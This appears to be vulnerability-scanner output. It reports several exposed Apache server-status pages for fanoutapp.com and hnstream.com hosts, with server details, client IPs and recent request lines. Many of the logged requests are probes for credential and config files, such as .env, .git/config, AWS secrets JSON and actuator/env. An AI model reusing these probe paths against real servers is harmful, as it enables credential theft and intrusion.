127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-624474230/14/237_ 0.491321420.00.030.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-624474230/15/240_ 0.491312020.00.040.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-624474230/14/227_ 0.4813325510.00.100.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-624474230/13/234_ 0.490318300.00.100.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-624474230/13/235_ 0.4814519290.00.020.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-624474230/11/224_ 0.4812320700.00.020.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-624474230/14/228_ 0.491318930.00.120.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-624474230/15/232_ 0.4811312120.00.030.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-6244742326/15/234W 0.480015620.00.030.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-624474230/14/241_ 0.4812319130.00.030.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-624474230/12/240_ 0.489315320.00.020.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-624474230/12/228_ 0.498321120.00.030.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-624474230/11/222_ 0.4810317870.00.020.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-624474230/12/229_ 0.489320910.00.030.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-624474230/10/228_ 0.497315620.00.020.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-624474230/14/224_ 0.497311900.00.020.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-624474230/9/226_ 0.496314660.00.010.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-624474240/7/192_ 0.25870733150.00.020.51 167.94.138.113http/1.1 1-624474240/6/188_ 0.252003711370.00.010.44 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-624474240/11/202_ 0.288711043890.00.030.62 167.94.138.113http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-624474240/8/187_ 0.273477412670.00.020.42 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-624474240/8/191_ 0.28351224530.00.100.80 127.0.0.1http/1.1api.hnstream.com:8000GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-624474240/10/201_ 0.2630423520.00.020.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-624474240/10/196_ 0.282008115550.00.020.68 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-624474240/7/192_ 0.2714713470.00.100.74 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 1-624474240/4/190_ 0.252263212760.00.010.51 87.121.84.49http/1.1 1-624474240/9/187_ 0.273477713230.00.020.65 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-624474240/9/193_ 0.282264022940.00.020.58 87.121.84.49http/1.1api.hnstream.com:8000CONNECT example.com:443 HTTP/1.1 1-624474240/6/190_ 0.273477718180.00.020.55 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-624474240/5/197_ 0.252264312640.00.080.59 87.121.84.49http/1.1 1-624474240/5/194_ 0.243472810310.00.010.65 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-624474240/7/188_ 0.282263016610.00.010.49 87.121.84.49http/1.1api.hnstream.com:8000CONNECT example.com:443 HTTP/1.1 1-624474240/8/191_ 0.273228211860.00.010.71 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-624474240/4/201_ 0.252572715370.00.010.68 165.227.101.0http/1.1 1-624474240/7/190_ 0.253223421550.00.020.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-624474240/6/190_ 0.273203111240.00.010.51 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-624474240/7/197_ 0.253203416560.00.020.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-624474240/8/181_ 0.253198410990.00.030.42 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-624474240/4/190_ 0.272850011070.00.010.55 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-624474240/8/184_ 0.2725722413960.00.010.56 165.227.101.0http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-624474240/9/206_ 0.272850114980.00.020.84 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-624474240/3/171_ 0.252845814680.00.010.54 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf8e3b44c2
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 23-Nov-2025 16:38:14 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 1 day 18 hours 43 minutes 38 seconds Server load: 0.23 0.19 0.17 Total accesses: 2680 - Total Traffic: 8.2 MB - Total Duration: 33956 CPU Usage: u4.01 s5.19 cu34.24 cs10.45 - .035% CPU load .0174 requests/sec - 55 B/second - 3189 B/request - 12.6701 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02068798no0yes025000 12068799no1yes124010 Sum201 149010 _______________________________W__________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-220687980/9/53_ 0.33245705940.00.010.19 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/9/51_ 0.372298348270.00.020.19 157.52.116.42http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-220687980/5/44_ 0.283783219940.00.010.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-220687980/7/46_ 0.36246249180.00.010.11 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 0-220687980/11/50_ 0.36378814440.00.090.20 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/11/50_ 0.362463374830.00.020.11 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-220687980/9/49_ 0.36379003530.00.020.11 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-220687980/9/48_ 0.284437764440.00.020.11 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-220687980/8/53_ 0.31717355520.00.020.15 127.0.0.1http/1.1api.hnstream.com:8000GET /api/.env HTTP/1.1 0-220687980/10/47_ 0.36278303470.00.020.10 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/6/46_ 0.28277827700.00.010.18 3.149.59.26http/1.1api.hnstream.com:8000\n 0-220687980/10/51_ 0.354442665140.00.020.19 167.82.160.83http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-220687980/10/50_ 0.354481410780.00.020.26 127.0.0.1http/1.1api.hnstream.com:8000GET /images/accesson.php HTTP/1.1 0-220687980/9/47_ 0.3422934013330.00.080.20 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-220687980/10/51_ 0.356145236230.00.090.19 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-220687980/10/48_ 0.31614034470.00.020.10 127.0.0.1http/1.1api.hnstream.com:8000GET /admin/.env HTTP/1.1 0-220687980/10/51_ 0.37197004340.00.020.11 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-220687980/10/48_ 0.3546853612160.00.020.11 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-220687980/9/58_ 0.32468037000.00.020.21 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php/_profiler/phpinfo HTTP/1.1 0-220687980/9/51_ 0.34196516430.00.020.19 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/9/48_ 0.304476189040.00.020.10 66.132.153.143http/1.1api.hnstream.com:8000\x16\x03\x01 0-220687980/8/50_ 0.371495210900.00.020.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-220687980/9/49_ 0.341490104680.00.020.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-220687980/8/42_ 0.297799103280.00.020.10 135.237.124.61http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-220687980/9/48_ 0.347178355730.00.020.11 104.156.83.103http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 1-220687990/26/54_ 0.6716316690.00.050.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-220687990/25/61_ 0.69136120.00.040.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-220687990/24/59_ 0.692317060.00.050.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-220687990/27/58_ 0.69036200.00.050.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-220687990/25/61_ 0.6717412260.00.190.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-220687990/26/56_ 0.691315220.00.050.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2206879926/24/53W 0.67003860.00.050.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-220687990/23/55_ 0.671534450.00.120.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-220687990/29/63_ 0.671535200.00.060.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-220687990/26/55_ 0.681235700.00.050.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-220687990/27/60_ 0.681436880.00.060.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-220687990/28/58_ 0.681234630.00.050.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-220687990/26/59_ 0.681334060.00.050.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-220687990/30/60_ 0.69334300.00.050.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-220687990/24/56_ 0.681134820.00.050.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-220687990/23/57_ 0.68934020.00.110.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-220687990/27/62_ 0.681033730.00.140.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-220687990/26/56_ 0.68838850.00.130.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-220687990/25/63_ 0.69735760.00.050.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-220687990/23/57_ 0.69833050.00.040.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-220687990/22/56_ 0.69634530.00.040.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-220687990/28/58_ 0.69634610.00.050.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-220687990/22/58_ 0.69535300.00.190.28 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-220687990/28/66_ 0.69436700.00.120.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-220687990/21/50_ 0.69434540.00.030.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 </ SrvChild Server number - generation
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf224b0041
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 21-Nov-2025 09:23:46 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 71 Parent Server MPM Generation: 70 Server uptime: 65 days 11 hours 18 minutes 39 seconds Server load: 0.08 0.14 0.15 Total accesses: 109863 - Total Traffic: 331.4 MB - Total Duration: 1359464 CPU Usage: u103.34 s163.6 cu1642.74 cs509.03 - .0428% CPU load .0194 requests/sec - 61 B/second - 3162 B/request - 12.3742 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11865694no0yes025000 21865693no1yes124010 Sum201 149010 ........................._________________________________W_____ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-62-0/0/1525. 0.006385854220130.00.004.86 127.0.0.1http/1.1api.hnstream.com:8000GET /download/.env.old HTTP/1.1 0-62-0/0/1455. 0.006385851178060.00.004.22 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1498. 0.006385850201680.00.004.19 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1520. 0.0063858510177000.00.004.95 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1474. 0.006385850182690.00.004.31 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1501. 0.006385857182450.00.005.04 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-62-0/0/1480. 0.0063858517171760.00.004.39 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1501. 0.0063858538188880.00.004.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-62-0/0/1501. 0.006385859157640.00.004.69 198.235.24.51http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1492. 0.0063858521159720.00.003.98 198.235.24.51http/1.1 0-62-0/0/1502. 0.0063858537177970.00.004.15 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-62-0/0/1482. 0.0063858514176400.00.004.39 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1500. 0.0063858564188330.00.004.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1461. 0.0063858510147470.00.004.20 178.22.24.11http/1.1api.hnstream.com:8000\x16\x03\x01\x02 0-62-0/0/1498. 0.0063858522143610.00.004.18 140.248.87.69http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1471. 0.0063858516160410.00.004.56 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1471. 0.0063858517150270.00.004.13 140.248.67.118http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1485. 0.006385854143560.00.004.15 147.185.132.83http/1.1api.hnstream.com:8000\x16\x03\x01 0-62-0/0/1494. 0.006385857196400.00.004.44 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1482. 0.0063858554141050.00.004.23 127.0.0.1http/1.1api.hnstream.com:8000GET /bins/ HTTP/1.1 0-62-0/0/1430. 0.006385852145770.00.004.42 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1491. 0.0063858556152910.00.004.25 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1473. 0.006385851154480.00.004.39 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1513. 0.006385850173670.00.004.47 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1481. 0.006385854139660.00.004.38 127.0.0.1http/1.1api.hnstream.com:8000GET /helper/config.env HTTP/1.1 1-7018656940/4/1472_ 0.178464236030.00.014.71 127.0.0.1http/1.1api.hnstream.com:8000GET /app/aws/anmeldeinformationen.php HTTP/1.1 1-7018656940/5/1445_ 0.1347540157840.00.013.89 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-7018656940/2/1406_ 0.1624001159450.00.004.74 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-7018656940/2/1428_ 0.1123952166000.00.004.05 140.248.88.53http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-7018656940/3/1444_ 0.13236730167670.00.014.54 157.52.109.49http/1.1api.livecounter.org:8000GET /.git/config HTTP/1.1 1-7018656940/4/1449_ 0.1784939169620.00.014.03 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-7018656940/4/1409_ 0.178497194250.00.014.51 127.0.0.1http/1.1api.hnstream.com:8000GET /%20%20%20%20%22/laravel/.env%22, HTTP/1.1 1-7018656940/2/1446_ 0.178494155730.00.014.08 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env/mailer_dsn_config.env HTTP/1.1 1-7018656940/3/1416_ 0.178484185110.00.014.38 127.0.0.1http/1.1api.hnstream.com:8000GET /aws/umgebung/aws_env_config.json HTTP/1.1 1-7018656940/4/1434_ 0.178484196320.00.014.02 127.0.0.1http/1.1api.hnstream.com:8000GET /docker/.envs/.production/.django HTTP/1.1 1-7018656940/4/1436_ 0.178484150410.00.013.90 127.0.0.1http/1.1api.hnstream.com:8000GET /django_project_path/.env.example HTTP/1.1 1-7018656940/4/1402_ 0.188464176200.00.013.98 127.0.0.1http/1.1api.hnstream.com:8000GET /%20%20%20%20%22/private/.env%22, HTTP/1.1 1-7018656940/5/1421_ 0.188464176650.00.014.32 127.0.0.1http/1.1api.hnstream.com:8000GET /.config/.env.example.development HTTP/1.1 1-7018656940/2/1415_ 0.188454201660.00.004.71 127.0.0.1http/1.1api.hnstream.com:8000GET /wp-content/uploads/aws_keys.json HTTP/1.1 1-7018656940/5/1392_ 0.188454163640.00.013.98 127.0.0.1http/1.1api.hnstream.com:8000GET /.ebextensions/environment.config HTTP/1.1 1-7018656940/3/1437_ 0.188454165560.00.014.21 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/secretsmanager/secrets.json HTTP/1.1 1-7018656940/6/1412_ 0.188444154720.00.015.15 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/secretsmanager/secrets.yaml HTTP/1.1 1-7018656940/3/1433_ 0.188444163450.00.014.16 127.0.0.1http/1.1api.hnstream.com:8000GET /wp-includes/aws_credentials.json HTTP/1.1 1-7018656940/5/1447_ 0.188433152690.00.014.83 127.0.0.1http/1.1api.hnstream.com:8000GET /web/aws/anmeldeinformationen.php HTTP/1.1 1-7018656940/4/1419_ 0.188424145870.00.014.47 127.0.0.1http/1.1api.hnstream.com:8000GET /api/aws/anmeldeinformationen.json HTTP/1.1 1-7018656940/4/1419_ 0.168374142640.00.024.54 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-7018656940/1/1398_ 0.1647590155950.00.004.35 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-7018656940/6/1426_ 0.1647590161680.00.094.24 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-7018656940/1/1451_ 0.0268890150090.00.004.59 62.60.131.80http/1.1 1-7018656940/5/1402_ 0.1370211156060.00.014.35 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf47e370fb
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 16-Nov-2025 20:52:09 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 66 Parent Server MPM Generation: 65 Server uptime: 60 days 22 hours 47 minutes 3 seconds Server load: 0.18 0.14 0.12 Total accesses: 104004 - Total Traffic: 313.1 MB - Total Duration: 1294088 CPU Usage: u96.47 s151.41 cu1509.53 cs466.02 - .0422% CPU load .0198 requests/sec - 62 B/second - 3156 B/request - 12.4427 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11398838no0yes025000 21398837no0yes124000 Sum200 149000 ........................._______________________________________ ____W______..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-62-0/0/1525. 0.002478884220130.00.004.86 127.0.0.1http/1.1api.hnstream.com:8000GET /download/.env.old HTTP/1.1 0-62-0/0/1455. 0.002478881178060.00.004.22 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1498. 0.002478880201680.00.004.19 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1520. 0.0024788810177000.00.004.95 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1474. 0.002478880182690.00.004.31 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1501. 0.002478887182450.00.005.04 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-62-0/0/1480. 0.0024788817171760.00.004.39 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1501. 0.0024788838188880.00.004.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-62-0/0/1501. 0.002478889157640.00.004.69 198.235.24.51http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1492. 0.0024788821159720.00.003.98 198.235.24.51http/1.1 0-62-0/0/1502. 0.0024788837177970.00.004.15 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-62-0/0/1482. 0.0024788814176400.00.004.39 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1500. 0.0024788864188330.00.004.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1461. 0.0024788810147470.00.004.20 178.22.24.11http/1.1api.hnstream.com:8000\x16\x03\x01\x02 0-62-0/0/1498. 0.0024788822143610.00.004.18 140.248.87.69http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1471. 0.0024788816160410.00.004.56 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1471. 0.0024788817150270.00.004.13 140.248.67.118http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1485. 0.002478884143560.00.004.15 147.185.132.83http/1.1api.hnstream.com:8000\x16\x03\x01 0-62-0/0/1494. 0.002478887196400.00.004.44 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1482. 0.0024788854141050.00.004.23 127.0.0.1http/1.1api.hnstream.com:8000GET /bins/ HTTP/1.1 0-62-0/0/1430. 0.002478882145770.00.004.42 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1491. 0.0024788856152910.00.004.25 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1473. 0.002478881154480.00.004.39 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1513. 0.002478880173670.00.004.47 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1481. 0.002478884139660.00.004.38 127.0.0.1http/1.1api.hnstream.com:8000GET /helper/config.env HTTP/1.1 1-6513988380/24/1346_ 0.736713224750.00.044.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-6513988380/23/1323_ 0.736703149550.00.053.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-6513988380/20/1307_ 0.756571151970.00.284.37 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-6513988380/21/1312_ 0.736523155960.00.043.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-6513988380/23/1340_ 0.756583153350.00.124.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 1-6513988380/22/1332_ 0.756603151560.00.053.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-6513988380/23/1303_ 0.736643170620.00.054.23 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-6513988380/23/1335_ 0.736693146150.00.043.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-6513988380/19/1301_ 0.736693164140.00.044.11 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-6513988380/23/1325_ 0.736683174640.00.053.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-6513988380/21/1328_ 0.736673145220.00.053.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-6513988380/23/1299_ 0.736673145220.00.053.74 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-6513988380/25/1314_ 0.736663162820.00.093.90 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-6513988380/22/1305_ 0.736663188660.00.064.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-6513988380/21/1284_ 0.736653144920.00.043.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-6513988380/17/1323_ 0.736643156520.00.043.88 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6513988380/23/1299_ 0.746633141790.00.124.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-6513988380/19/1323_ 0.746623152670.00.123.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-6513988380/26/1336_ 0.756613140470.00.144.36 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-6513988380/19/1309_ 0.756623140070.00.054.14 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-6513988380/20/1309_ 0.756603134910.00.054.08 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 1-6513988380/21/1290_ 0.756593144150.00.053.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e2932313e2130313e2135313/_/;/META-INF/maven/com.atla 1-6513988380/25/1311_ 0.756593152490.00.053.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-6513988380/20/1334_ 0.756583142390.00.044.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-6513988380/20/1296_ </
Severity: medium
